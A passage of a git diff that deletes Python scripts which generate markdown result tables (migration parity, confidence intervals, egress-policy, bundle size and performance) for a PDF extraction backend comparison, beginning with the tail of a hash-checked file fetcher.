follow_redirects=True) - r.raise_for_status() - except Exception as exc: # noqa: BLE001 - problems.append(f"{rel}: fetch failed ({type(exc).__name__}: {exc}) from {url}") - continue - got = hashlib.sha256(r.content).hexdigest() - if got != sha: - # Not written. A re-issued package is a finding about govinfo, not an input. - problems.append( - f"{rel}: sha256 mismatch from {url}\n" - f" frozen {sha} ({nbytes} bytes)\n" - f" fetched {got} ({len(r.content)} bytes)" - ) - continue - dest.parent.mkdir(parents=True, exist_ok=True) - dest.write_bytes(r.content) - ok += 1 - fetched += 1 - print(f" fetched {rel}", file=sys.stderr) - - print(f"\n{ok}/{len(files)} files present and hash-correct ({fetched} downloaded)", file=sys.stderr) - if problems: - print(f"\n{len(problems)} PROBLEM(S) -- the holdout is NOT restored:", file=sys.stderr) - for p in problems: - print(f" {p}", file=sys.stderr) - return 1 - return 0 - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py b/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py deleted file mode 100644 index d7174641..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py +++ /dev/null @@ -1,294 +0,0 @@ -"""Generate every table in RESULTS-CONFIRMATORY.md from the raw result JSON. - -Same splice-between-markers discipline as fill_results.py: no number in the published -document is transcribed by hand. If a table is missing here, it does not belong in the -document. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_confirmatory.py -""" - -from __future__ import annotations - -import json -import sys -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -BAKEOFF = REPO / "docs/research/pdf-backend-bakeoff" -RESULTS = BAKEOFF / "results" -DOC = BAKEOFF / "RESULTS-CONFIRMATORY.md" - -CAND = ("pdfium-wasm", "pdfminer") - - -def load(name: str) -> dict | None: - p = RESULTS / name - return json.loads(p.read_text()) if p.exists() else None - - -def splice(text: str, marker: str, block: str) -> str: - start, end = f"", f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -# ---------- Concern A --------------------------------------------------------- - - -def migration_table(data: dict) -> str: - pairs = data["pairs"] - accepted, declined = [], [] - for key, e in pairs.items(): - prim = e.get("repaired", {}) - dec = (prim.get(data["incumbent"], {}) or {}).get("production_declined") or [] - (declined if dec else accepted).append((key, e)) - - out = [ - f"**Primary mode `repaired`. {len(accepted)} production-accepted pairs are the migration " - f"gate; {len(declined)} production-declined pairs are diagnostics and decide nothing.**", - "", - "| | " + " | ".join(CAND) + " |", - "|---|" + "---|" * len(CAND), - ] - - def tally(rows, field): - cells = [] - for b in CAND: - ok = sum(1 for _k, e in rows if e.get("repaired", {}).get(b, {}).get(field) is True) - n = sum(1 for _k, e in rows if b in e.get("repaired", {})) - cells.append(f"**{ok}/{n}**" if ok == n and n else f"{ok}/{n}") - return cells - - na, nd = len(accepted), len(declined) - for label, field, rows in ( - (f"A1 amounts identical ({na} accepted)", "A1_amounts_identical", accepted), - (f"A2 changes identical ({na} accepted)", "A2_changes_identical", accepted), - (f"A4 full text identical ({na} accepted)", "A4_text_identical", accepted), - (f"A5 line numbers identical ({na} accepted)", "A5_line_numbers_identical", accepted), - (f"A1 amounts identical ({nd} declined, diagnostic)", "A1_amounts_identical", declined), - (f"A2 changes identical ({nd} declined, diagnostic)", "A2_changes_identical", declined), - ): - out.append(f"| {label} | " + " | ".join(tally(rows, field)) + " |") - - # A pair with zero amount entries on BOTH sides passes A1 vacuously: there is no - # multiset to break, so neither the candidate's pass nor the control's failure to break - # it carries information. Substantive pairs are counted separately, because "13/13 - # identical" reads as thirteen pieces of evidence when three of them are empty. - def substantive(rows, key): - return [(k, e) for k, e in rows if (e.get("repaired", {}).get("pdfium-native", {}) or {}).get(key, 0) > 0] - - sub_amt = substantive(accepted, "n_amount_entries") - sub_chg = substantive(accepted, "n_changes") - out += [ - "", - f"**Evidential content.** {len(sub_amt)} of the {len(accepted)} accepted pairs carry any " - f"amount entries at all; the rest pass A1 vacuously (empty multiset on both sides) and are " - f"not evidence of amount parity in either direction. {len(sub_chg)} carry any changes.", - "", - "**B0 controls — each must FAIL its own gate, and can only do so where the gate has content.**", - "", - "| control | gate | broke the gate | on content-bearing pairs | verdict |", - "|---|---|---|---|---|", - ] - ctl = { - "SA1": ("A1_amounts_identical", sub_amt), - "SA2": ("A2_changes_identical", sub_chg), - "SA3": ("A4_text_identical", accepted), - } - for sid, (field, rows) in ctl.items(): - failed_all = sum(1 for _k, e in accepted if e.get("repaired", {}).get(sid, {}).get(field) is False) - n_all = sum(1 for _k, e in accepted if sid in e.get("repaired", {})) - failed_sub = sum(1 for _k, e in rows if e.get("repaired", {}).get(sid, {}).get(field) is False) - n_sub = len(rows) - gate = field.split("_")[0] - ok = failed_sub == n_sub and n_sub - verdict = "**live**" if ok else f"**UNPROVEN on {n_sub - failed_sub} content-bearing pair(s)**" - out.append(f"| {sid} | {gate} | {failed_all}/{n_all} | {failed_sub}/{n_sub} | {verdict} |") - return "\n".join(out) - - -# ---------- Concern B --------------------------------------------------------- - - -def b_delta_table(rep: dict) -> str: - out = [ - f"Δ = score(pdfminer) − score(pdfium-wasm); positive favours pdfminer. " - f"{rep['resamples']:,} paired cluster resamples by bill, seed {rep['seed']}, `{rep['mode']}` mode.", - "", - "| metric | pdfium-wasm | pdfminer | Δ | 95% CI | practical δ | verdict |", - "|---|---|---|---|---|---|---|", - ] - for m, s in rep["delta"].items(): - if s.get("point") is None: - out.append(f"| {m} | | | | | {s.get('threshold')} | insufficient data |") - continue - pw = rep["means"]["pdfium-wasm"].get(m) - pm = rep["means"]["pdfminer"].get(m) - ci = f"[{s['ci'][0]:+.4f}, {s['ci'][1]:+.4f}]" - out.append( - f"| {m} | {pw if pw is None else f'{pw:.4f}'} | {pm if pm is None else f'{pm:.4f}'} | " - f"{s['point']:+.4f} | {ci} | {s['threshold']} | {s['verdict']} |" - ) - return "\n".join(out) - - -def b0_table(rep: dict) -> str: - out = [ - "**Every metric's own control, reported beside it. A Δ without its control row is not reviewable.**", - "", - "| metric | control | Δ from sabotage | practical δ | verdict |", - "|---|---|---|---|---|", - ] - for m, r in rep["B0"].items(): - d = "n/a" if r.get("delta") is None else f"{r['delta']:+.4f}" - out.append( - f"| {m} | {r['control']} | {d} | {r.get('threshold', '')} | " - f"{'fires' if r['fires'] else '**did not fire — metric VOID**'} |" - ) - out += ["", "| separability | own metric | B2 | verdict |", "|---|---|---|---|"] - for r in rep["separability"]: - if r.get("verdict") == "insufficient data": - out.append(f"| {r['control']} | | | insufficient data |") - continue - out.append( - f"| {r['control']} | {r['own_metric']} {r['own_delta']:+.4f} | " - f"{r['other_delta']:+.4f} | **{r['verdict']}** |" - ) - return "\n".join(out) - - -# ---------- Concern C --------------------------------------------------------- - - -def egress_table(data: dict) -> str: - s = data["summary"] - out = [ - f"Policy under test: `{data['policy']}`", - "", - f"Of **{data['n_vectors_frozen']} frozen mechanisms**, {s['eligible']} transmitted in the " - f"no-policy control and are eligible for scoring. **{s['blocked']} blocked**, " - f"**{len(s['bypasses_policy'])} bypass the policy**, " - f"**{len(s['outside_csp'])} are outside what CSP governs** " - f"({', '.join(s['outside_csp']) or 'none'}). " - f"{len(s['not_scored'])} never transmitted in the control and are not scored " - f"({', '.join(s['not_scored'])}).", - "", - "| vector | control | policy result |", - "|---|---|---|", - ] - for r in data["table"]: - out.append(f"| `{r['vector']}` | {r['control']} | {r['policy_result']} |") - out += ["", "| validity condition | holds |", "|---|---|"] - for k, v in data["validity"].items(): - out.append(f"| {k} | {'yes' if v else '**NO — run void**'} |") - return "\n".join(out) - - -def isolation_table(data: dict) -> str: - out = ["| check | result |", "|---|---|"] - for k, v in data["checks"].items(): - out.append(f"| {k} | {'**PASS**' if v else '**FAIL**'} |") - out += [ - "", - f"Verdict: **{data['verdict']}**. Linux container: {data['linux_container']}.", - ] - return "\n".join(out) - - -# ---------- Concern E --------------------------------------------------------- - - -def bundle_table(data: dict) -> str: - def mb(n): - return f"{n / 1e6:.2f} MB" - - base = data["baseline"] - out = [ - f"Unit: {data['unit']}.", - "", - f"Shared Pyodide + DeltaTrack baseline: **{mb(base['wire'])}** over the wire ({mb(base['bytes'])} raw).", - "", - "| artifact | incremental backend cost | full artifact |", - "|---|---|---|", - ] - for name, t in data["backends"].items(): - out.append(f"| {name} | **{mb(t['wire'])}** | {mb(t['artifact_wire'])} |") - a = data["backends"]["pdfium-wasm"]["wire"] - for name, t in data["backends"].items(): - if name == "pdfium-wasm": - continue - out.append("") - out.append(f"`{name}` is **{t['wire'] / a:.2f}×** PDFium-WASM's incremental cost.") - return "\n".join(out) - - -# ---------- Concern D --------------------------------------------------------- - - -def perf_table(data: dict) -> str: - out = [] - if data.get("void"): - out += [ - f"> **THIS RUN IS VOID.** {data['void_reason']}: load average " - f"{data['load_average_start'][0]:.2f} against a ceiling of {data['load_ceiling']}. " - "The numbers are published as void rather than withheld, and no gate verdict below " - "counts. The exploratory gate-9 figure that failed to reproduce was measured under " - "exactly this condition, undeclared.", - "", - ] - out += [ - f"Document: `{data['document']}`. Estimator: {data['estimator']} of {data['trials']}.", - "", - "| backend | min | median | max | spread | cpu/wall at min | D1 | D2 |", - "|---|---|---|---|---|---|---|---|", - ] - for b, e in data["backends"].items(): - if "min_s" not in e: - out.append(f"| {b} | — | — | — | — | — | {e.get('error', 'error')} | |") - continue - out.append( - f"| {b} | {e['min_s']:.2f} s | {e['median_s']:.2f} s | {e['max_s']:.2f} s | " - f"{e['spread_s']:.2f} s | {e['cpu_wall_ratio_at_min']} | {e['D1']} | {e.get('D2', '—')} |" - ) - return "\n".join(out) - - -def main() -> None: - if not DOC.exists(): - print(f"no {DOC.name} yet — nothing to fill", file=sys.stderr) - return - doc = DOC.read_text() - filled = [] - - for name, marker, fn in ( - ("migration_p1.json", "A_P1", migration_table), - ("migration_p2.json", "A_P2", migration_table), - ("confirm_p1_report_strict.json", "B_P1_DELTA", b_delta_table), - ("confirm_p1_report_strict.json", "B_P1_B0", b0_table), - ("confirm_p2_report_strict.json", "B_P2_DELTA", b_delta_table), - ("confirm_p2_report_strict.json", "B_P2_B0", b0_table), - ("confirm_egress.json", "C_EGRESS", egress_table), - ("confirm_isolation.json", "C_ISOLATION", isolation_table), - ("confirm_bundle.json", "E_BUNDLE", bundle_table), - ("confirm_perf.json", "D_PERF", perf_table), - ): - data = load(name) - if data is None: - print(f" skip {marker}: {name} absent", file=sys.stderr) - continue - try: - doc = splice(doc, marker, fn(data)) - filled.append(marker) - except Exception as exc: # noqa: BLE001 - print(f" FAIL {marker}: {type(exc).__name__}: {exc}", file=sys.stderr) - - DOC.write_text(doc) - print(f"filled: {', '.join(filled) or 'nothing'}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py b/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py deleted file mode 100644 index e8f8448a..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py +++ /dev/null @@ -1,496 +0,0 @@ -"""Generate every table in RESULTS-HYBRID.md from the raw result JSON. - -Same splice-between-markers discipline as fill_results.py and fill_confirmatory.py: no -number in the published document is transcribed by hand. A table that is not generated -here does not belong in the document. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_hybrid.py -""" - -from __future__ import annotations - -import json -import statistics -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -BAKEOFF = REPO / "docs/research/pdf-backend-bakeoff" -RESULTS = BAKEOFF / "results" -DOC = BAKEOFF / "RESULTS-HYBRID.md" - -PATHS = ("glyph", "hybrid", "pdfminer") -TARGETS = ("FAMILY HOUSING", "NAVY AND", "ARMY NATIONAL", "AMERICAN BATTLE") - - -def load(name: str): - p = RESULTS / name - return json.loads(p.read_text()) if p.exists() else None - - -def splice(text: str, marker: str, block: str) -> str: - start, end = f"", f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -def missing(what: str) -> str: - return f"_(not generated: `{what}` is absent from `results/`. Run the probe, then re-run `fill_hybrid.py`.)_" - - -# ---------- the four named headings ------------------------------------------- - - -def headings_table(data: dict) -> str: - out = [ - "| document | heading | production | glyph | **hybrid** | pdfminer |", - "|---|---|---|---|---|---|", - ] - for doc, per in data.items(): - for target in TARGETS: - cells = [] - for path in ("production", "glyph", "hybrid", "pdfminer"): - o = per.get(target, {}).get(path) - if o is None: - cells.append("—") - continue - cell = f"{o['correct']} ok" - if o["corrupted"]: - cell = f"**{o['correct']} ok / {o['corrupted']} malformed**" - cells.append(cell) - out.append(f"| `{doc}` | {target} | " + " | ".join(cells) + " |") - tot = {p: [0, 0] for p in ("production", "glyph", "hybrid", "pdfminer")} - for per in data.values(): - for target in TARGETS: - for path, o in per.get(target, {}).items(): - tot[path][0] += o["correct"] - tot[path][1] += o["corrupted"] - out.append( - "| **all** | **all four** | " - + " | ".join( - f"{v[0]} ok / {v[1]} malformed" for v in (tot[p] for p in ("production", "glyph", "hybrid", "pdfminer")) - ) - + " |" - ) - return "\n".join(out) - - -# ---------- separability ------------------------------------------------------ - - -def separability_table(data: dict) -> str: - out = [ - "| document | word boundaries | intra-word | boundary gap/size min | intra-word max | separable | " - "best threshold, errors | shipped 0.25, errors |", - "|---|---|---|---|---|---|---|---|", - ] - for path, s in data.items(): - if s is None: - continue - name = "**POOLED**" if path == "__pooled__" else f"`{Path(path).name}`" - out.append( - f"| {name} | {s['word_boundaries']} | {s['intra_word']} | {s['boundary_ratio_min']} | " - f"{s['intra_ratio_max']} | **{'yes' if s['separable'] else 'NO'}** | " - f"{s['best_threshold']}, {s['best_threshold_errors']} | " - f"{s['shipped_0.25_missed_spaces']} missed + {s['shipped_0.25_spurious_spaces']} spurious |" - ) - return "\n".join(out) - - -# ---------- corpus parity ----------------------------------------------------- - - -def _mean(vals): - vals = [v for v in vals if v is not None] - return round(statistics.mean(vals), 5) if vals else None - - -def corpus_table(data: dict) -> str: - docs = [d for d in data["documents"] if "vs_production" in d] - scored = [d for d in docs if not d.get("production_declined")] - heading_docs = [d for d in scored if any(r["H2_labels_reference"] > 0 for r in d["vs_production"].values())] - rows = [] - for path in PATHS: - e = [d["vs_production"][path] for d in scored if path in d["vs_production"]] - h = [d["vs_production"][path] for d in heading_docs if path in d["vs_production"]] - rows.append( - { - "path": path, - "n": len(e), - "text_identical": sum(1 for r in e if r["H1_text_identical"]), - "text_f1": _mean([r["H1_token_f1"] for r in e]), - "n_head": len(h), - "labels_exact": sum(1 for r in h if r["H2_labels_exact"]), - "labels_absent": sum(r["H2_absent_from_reference"] for r in h), - "labels_missed": sum(r["H2_missed_from_reference"] for r in h), - "breadcrumb": _mean([r["H3_breadcrumb_accuracy"] for r in h]), - "lines_identical": sum(1 for r in e if r["H4_line_numbers_identical"]), - "lines_jaccard": _mean([r["H4_line_numbers_jaccard"] for r in e]), - "assoc": _mean([r["H5_assoc_accuracy"] for r in h]), - } - ) - out = [ - f"Reference is **production** (`extract_clean_pages`) on the {len(scored)} corpus documents " - f"production accepts. Heading metrics (H2/H3/H5) are over the {rows[0]['n_head']} of those " - "that carry any heading; the rest cannot discriminate.", - "", - "| metric | " + " | ".join(f"**{p}**" if p == "hybrid" else p for p in PATHS) + " |", - "|---|" + "---|" * len(PATHS), - ] - - def row(label, key, fmt="{}"): - return f"| {label} | " + " | ".join(fmt.format(r[key]) for r in rows) + " |" - - out += [ - "| H1 full text digest identical | " + " | ".join(f"{r['text_identical']}/{r['n']}" for r in rows) + " |", - row("H1 mean token F1 vs production", "text_f1"), - "| H2 heading-label set exact | " + " | ".join(f"{r['labels_exact']}/{r['n_head']}" for r in rows) + " |", - row("H2 labels production does NOT produce", "labels_absent"), - row("H2 production labels missed", "labels_missed"), - row("H3 breadcrumb (parent) agreement", "breadcrumb"), - "| H4 line-number set identical | " + " | ".join(f"{r['lines_identical']}/{r['n']}" for r in rows) + " |", - row("H4 mean line-number Jaccard", "lines_jaccard"), - row("H5 amount→heading agreement", "assoc"), - ] - return "\n".join(out) - - -def accuracy_table(data: dict) -> str: - """The same paths against XML, so parity is not mistaken for correctness. - - Reported in TWO STRATA, and the split is not cosmetic. `RESULTS-CONFIRMATORY.md` - recorded that every corpus document where the paths' heading recovery differs carries a - ``, which the DeltaTrack#11 parser defect drops from the XML reference. - Excluding those documents therefore removes exactly the documents that can - discriminate, and one pooled figure over the remainder reads as "all paths are - equivalent" when what it says is "these documents cannot tell them apart." - - Each stratum carries a generated `can this stratum discriminate?` row, derived from - whether any path differs from production on labels inside it. A stratum answering NO is - published and is not evidence. - """ - cols = ("production",) + PATHS - accepted = [d for d in data["documents"] if "vs_xml" in d and not d.get("production_declined")] - strata = ( - ("primary — no ``", [d for d in accepted if not d.get("quoted_block")]), - ("quoted-block stratum", [d for d in accepted if d.get("quoted_block")]), - ) - out = [ - "Reference is **XML**. `production` is a fourth column rather than the reference, because " - "against XML it is a candidate like any other.", - ] - for name, docs in strata: - differs = sum( - 1 - for d in docs - if any( - r["H2_absent_from_reference"] or r["H2_missed_from_reference"] - for r in (d.get("vs_production") or {}).values() - ) - ) - verdict = ( - f"**YES** — {differs} of {len(docs)} documents separate the paths" - if differs - else f"**NO** — no path differs from production anywhere in these {len(docs)}" - ) - out += [ - "", - f"**{name}** — {len(docs)} documents. _Can this stratum discriminate?_ {verdict}", - "", - "| metric | " + " | ".join(f"**{p}**" if p == "hybrid" else p for p in cols) + " |", - "|---|" + "---|" * len(cols), - ] - for label, metric, field in ( - ("B2 heading-label F1", "B2", "f1"), - ("B5 amount→heading F1", "B5", "f1"), - ("B6 parent/child accuracy", "B6", "accuracy"), - ): - cells = [ - str(_mean([d["vs_xml"][p][metric].get(field) for d in docs if p in d.get("vs_xml", {})])) for p in cols - ] - out.append(f"| {label} | " + " | ".join(cells) + " |") - return "\n".join(out) - - -def pairs_table(data: dict) -> str: - pairs = [p for p in data["pairs"] if "vs_production" in p] - out = [ - f"Reference is **production**'s canonical diff over {len(pairs)} consecutive version pairs. " - "`amounts` is the `Counter[(old, new, kind)]` of `amount_entries` — the money, and the " - "highest-consequence field. `changes` is the `Counter[(change_type, norm(old), norm(new))]` " - "signature set, which embeds the line text and therefore cannot be byte-identical for any " - "path that assembles lines geometrically; its **overlap** is the informative figure and the " - "identity column is reported only so the distinction is visible.", - "", - "| path | amount signatures identical | amount recall | change signatures identical | change recall |", - "|---|---|---|---|---|", - ] - ref_amt = sum(p.get("n_amount_entries_production", 0) for p in pairs) - ref_chg = sum(p.get("n_changes_production", 0) for p in pairs) - for path in PATHS: - e = [p["vs_production"][path] for p in pairs if path in p["vs_production"]] - if not e: - continue - a = sum(1 for r in e if r["H6_amounts_identical"]) - c = sum(1 for r in e if r["H6_changes_identical"]) - ao = sum(r["H6_amount_overlap"] for r in e) - co = sum(r["H6_change_overlap"] for r in e) - name = f"**{path}**" if path == "hybrid" else path - out.append( - f"| {name} | {a}/{len(e)} | {round(ao / ref_amt, 5) if ref_amt else '—'} ({ao}/{ref_amt}) | " - f"{c}/{len(e)} | {round(co / ref_chg, 5) if ref_chg else '—'} ({co}/{ref_chg}) |" - ) - return "\n".join(out) - - -def signals_table(data: dict) -> str: - out = [ - "| document | generated chars | with a real box | with a size | with a font name | missing origin | " - "glyph_size coverage | LineGeom coverage | margin/body font separation |", - "|---|---|---|---|---|---|---|---|---|", - ] - for path, e in data.items(): - s1, s2, s3 = e["S1"], e["S2"], e["S3"] - rate = f"{s1['chars_generated']}/{s1['chars_total']} ({s1['generated_rate']:.1%})" - sep = s3["separation_rate"] - sep_cell = f"{sep} over {s3['numbered_lines_with_both']} lines" if sep is not None else "—" - out.append( - f"| `{Path(path).name}` | {rate} | **{s1['generated_with_real_box']}** | " - f"**{s1['generated_with_size']}** | **{s1['generated_with_font_name']}** | " - f"**{s1['generated_missing_origin']}** | {s2['size_coverage']} ({s2['numbered_lines']} lines) | " - f"{s2['geom_coverage']} | {sep_cell} |" - ) - return "\n".join(out) - - -def normalize_raw_scope_table(data: dict) -> str: - """Where the dangling-hyphen gap lives, over a mixed stratum. - - The point of this table is the dichotomy, not the totals: the mid-line branch either - barely fires (numbered layouts, where the two paths agree exactly) or fires in the - thousands (unnumbered layouts, where they diverge). A pooled figure would average the - two into a middling rate that describes neither. - """ - out = [ - "The same probe over a **mixed** stratum, to locate the limitation rather than " - "just measure it. `declined` is production's own unnumbered-layout guard.", - "", - "| document | production declines it | mid-line branch fired | trailing-hyphen tokens (prod / hybrid) | " - "hyphenated tokens only in hybrid |", - "|---|---|---|---|---|", - ] - for r in data["documents"]: - b, d, dec = r["branch_fired"], r["diff"], r["production_declined"] - agree = d["trailing_hyphen_production"] == d["trailing_hyphen_hybrid"] and not d["hyphenated_only_in_hybrid"] - out.append( - f"| `{r['doc']}` | {'**yes**' if dec else 'no'} | {b['midline_hyphen_lowercase']:,} | " - f"{d['trailing_hyphen_production']} / {d['trailing_hyphen_hybrid']}" - f"{' — **identical**' if agree else ''} | {d['hyphenated_only_in_hybrid']} |" - ) - return "\n".join(out) - - -def geometry_agreement_table(data: dict) -> str: - """Do the sidecar VALUES match production's, not merely exist?""" - out = [ - "Agreement is over the numbered lines both paths recovered, to a 0.05 pt tolerance " - "(these are floats derived through different call paths, so exact equality would " - "report noise as disagreement).", - "", - "| document | shared numbered lines | `glyph_size` | `content_left` | `content_right` | `first_word_right` |", - "|---|---|---|---|---|---|", - ] - for path, e in data.items(): - s = e.get("S4") - if not s: - continue - out.append( - f"| `{Path(path).name}` | {s['lines_shared']} | {s['glyph_size_agree']} | " - f"{s['content_left_agree']} | {s['content_right_agree']} | **{s['first_word_right_agree']}** |" - ) - return "\n".join(out) - - -def portability_table(data: dict) -> str: - out = [ - "| document | raw stream identical | trailing-space divergences | line-break-vs-space | " - "**unclassified** | **page text digest identical** | line numbers identical | heading labels identical |", - "|---|---|---|---|---|---|---|---|", - ] - for path, e in data.items(): - k = e["stream_diff_kinds"] - out.append( - f"| `{Path(path).name}` | {e['stream_identical']} | {k['line_trailing_space']} | " - f"{k['line_break_vs_space']} | **{k['unclassified']}** | **{e['pages_text_identical']}** | " - f"{e['pages_line_numbers_identical']} ({e['n_line_numbers']}) | " - f"{e['pages_labels_identical']} ({e['n_labels']}) |" - ) - return "\n".join(out) - - -def wasm_table(data: dict) -> str: - present = data["entry_points_present"] - out = [ - f"`@embedpdf/pdfium` **{data['wrapper_version']}**, called for real on a GPO bill page " - f"({data['count_chars']} characters). Presence is asked of the wrapper object an adapter would " - "call, and each function is then invoked on every character so an exported stub cannot pass.", - "", - "| entry point | exported | exercised |", - "|---|---|---|", - ] - ex = data["exercised"] - hits = { - "FPDFText_GetCharBox": ex["charbox"], - "FPDFText_GetMatrix": ex["matrix"], - "FPDFText_GetCharOrigin": ex["origin"], - "FPDFText_IsGenerated": ex["generated"], - "FPDFText_IsHyphen": ex["hyphen"], - "FPDFText_GetFontInfo": ex["fontinfo"], - "FPDFText_HasUnicodeMapError": ex["maperror"], - } - for name, ok in present.items(): - n = hits.get(name) - note = f"{n} non-trivial returns" if n is not None else "called" - out.append(f"| `{name}` | {'yes' if ok else '**NO**'} | {note} |") - out.append("") - out.append(f"**All {len(present)} required entry points present: {data['all_present']}.**") - return "\n".join(out) - - -def backend_spacing_table(data: dict) -> str: - out = [ - f"Probe boundary: `{data['probe_text']}` on `{data['pdf']}` page {data['page']}. The neutral " - f"glyph layer produces `{data['probe_text'].replace(' ', '')}` here.", - "", - "| backend | its own text keeps the space | produces the joined form | how a synthesised character is marked |", - "|---|---|---|---|", - ] - for name, r in data["backends"].items(): - if "error" in r: - out.append(f"| {name} | — | — | ERROR: {r['error'][:60]} |") - continue - out.append( - f"| {name} | **{r['recovers_space']}** | **{r['produces_joined_form']}** | {r['generated_marker']} |" - ) - out.append("| **the glyph seam** | **False** | **True** | n/a — the information is discarded before this point |") - return "\n".join(out) - - -def adapter_table(data: dict) -> str: - """Corpus-scale totals from the adapter's own counters. - - These are the claims the contract rests on, each stated as a count that can be - non-zero: an index skew would mean the char index does not address both the character - and its geometry; unnamed ink would mean the stream lost a glyph; a unicode map error - would mean a character PDFium could not name at all. - """ - keys = ( - ("pages", "pages"), - ("chars", "characters"), - ("generated_chars", "engine-generated characters"), - ("hyphen_chars", "`FPDFText_IsHyphen` characters"), - ("index_skew_pages", "**pages where CountChars != len(text)**"), - ("unnamed_ink", "**ink the engine could not name**"), - ("unicode_map_errors", "**unicode map errors**"), - # Counted in the non-generated branch only. A generated character has no font name - # by construction, and folding those in would make the row unreadable. - ("empty_font_names", "**non-generated characters with an empty font name**"), - ) - tot = dict.fromkeys((k for k, _ in keys), 0) - n = 0 - for d in data["documents"]: - s = (d.get("extract") or {}).get("hybrid") - if not s: - continue - n += 1 - for k in tot: - tot[k] += s.get(k, 0) - out = [ - f"Counters from the hybrid adapter itself, aggregated over all {n} corpus documents.", - "", - "| | total |", - "|---|---|", - ] - for k, label in keys: - out.append(f"| {label} | {tot[k]:,} |") - if tot["chars"]: - out.append(f"| generated-character rate | {tot['generated_chars'] / tot['chars']:.2%} |") - return "\n".join(out) - - -def normalize_raw_table(data: dict) -> str: - """Whether `normalize_raw`'s branches repair damage the hybrid path still has. - - Each row is a document where the branches fire, with the token-level artifacts the - branches exist to prevent. Non-zero `hyphen artifacts` on a document where the - mid-line branch fires would falsify section 8's claim. - """ - rows = data["documents"] - out = [ - "Measured on the **production-declined** stratum — the unnumbered layouts, mostly " - "enrolled bills, which section 5's parity table excludes and which are exactly where " - "`normalize_raw`'s mid-line soft-hyphen branch exists to act (its docstring names them). " - "A branch counts as having fired by matching its own pattern against PDFium's raw page " - "text, so the zeros to its right are only meaningful because the number to its left is " - "large.", - "", - "| document | mid-line branch fired | trailing-hyphen tokens (prod / hybrid) | " - "soft-hyphen chars in text (prod / hybrid) | hyphenated tokens only in hybrid |", - "|---|---|---|---|---|", - ] - tot = {k: 0 for k in ("fired", "th_p", "th_h", "sh_p", "sh_h", "only_h")} - for r in rows: - b, d = r["branch_fired"], r["diff"] - tot["fired"] += b["midline_hyphen_lowercase"] - tot["th_p"] += d["trailing_hyphen_production"] - tot["th_h"] += d["trailing_hyphen_hybrid"] - tot["sh_p"] += d["soft_hyphen_chars_production"] - tot["sh_h"] += d["soft_hyphen_chars_hybrid"] - tot["only_h"] += d["hyphenated_only_in_hybrid"] - out.append( - f"| `{r['doc']}` | {b['midline_hyphen_lowercase']:,} | " - f"{d['trailing_hyphen_production']} / {d['trailing_hyphen_hybrid']} | " - f"{d['soft_hyphen_chars_production']} / {d['soft_hyphen_chars_hybrid']} | " - f"**{d['hyphenated_only_in_hybrid']}** |" - ) - out.append( - f"| **total** | **{tot['fired']:,}** | {tot['th_p']} / {tot['th_h']} | " - f"{tot['sh_p']} / {tot['sh_h']} | **{tot['only_h']}** |" - ) - samples = [s for r in rows for s in r["diff"]["samples_only_in_hybrid"]] - if samples: - out += ["", "Hyphenated tokens the hybrid produces and production does not:", ""] - out += [f"- `{s}`" for s in samples[:20]] - return "\n".join(out) - - -def main() -> None: - text = DOC.read_text() - jobs = [ - ("H_ADAPTER", "hybrid_docs.json", adapter_table), - ("H_NORMALIZE_RAW", "probe_normalize_raw.json", normalize_raw_table), - ("H_NORMALIZE_RAW_SCOPE", "probe_normalize_raw_all.json", normalize_raw_scope_table), - ("H_BACKEND_SPACING", "probe_backend_spacing.json", backend_spacing_table), - ("H_HEADINGS", "probe_failure_headings.json", headings_table), - ("H_SEPARABILITY", "probe_separability.json", separability_table), - ("H_CORPUS", "hybrid_docs.json", corpus_table), - ("H_ACCURACY", "hybrid_docs.json", accuracy_table), - ("H_PAIRS", "hybrid_pairs.json", pairs_table), - ("H_SIGNALS", "probe_hybrid_signals.json", signals_table), - ("H_GEOM_AGREE", "probe_hybrid_signals.json", geometry_agreement_table), - ("H_PORTABILITY", "hybrid_portability.json", portability_table), - ("H_WASM", "hybrid_wasm_entrypoints.json", wasm_table), - ] - for marker, source, fn in jobs: - data = load(source) - block = fn(data) if data else missing(source) - text = splice(text, marker, block) - DOC.write_text(text) - print(f"wrote {DOC}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/fill_results.py b/docs/research/pdf-backend-bakeoff/probes/fill_results.py deleted file mode 100644 index ac4a1d35..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/fill_results.py +++ /dev/null @@ -1,184 +0,0 @@ -"""Fill RESULTS.md's table placeholders from the raw result JSON. - -Generated rather than transcribed, so the published tables cannot drift from the runs -that produced them. Idempotent: it replaces the block between each marker and its -closing marker, so it can be re-run after a re-scored phase. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/fill_results.py -""" - -from __future__ import annotations - -import json -import statistics -from pathlib import Path - -HERE = Path(__file__).resolve().parent -DOC = HERE.parent / "RESULTS.md" -RESULTS = HERE.parent / "results" -INCUMBENT = "pdfium-native" -LABEL = { - "pdfium-native": "pdfium-native *(incumbent)*", - "pdfium-wasm": "**pdfium-wasm**", - "pdfminer": "**pdfminer**", - "pymupdf": "pymupdf *(ceiling)*", - "pdfjs": "pdfjs", - "pypdf": "pypdf", -} - - -def mean(xs): - return statistics.mean(xs) if xs else float("nan") - - -def t4_table(data: dict) -> str: - pairs = data["pairs"] - backends = data["backends"] - mode = "repaired" - - def cell(p, b, *keys): - e = pairs[p].get(f"{b}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - scored = [p for p in pairs if 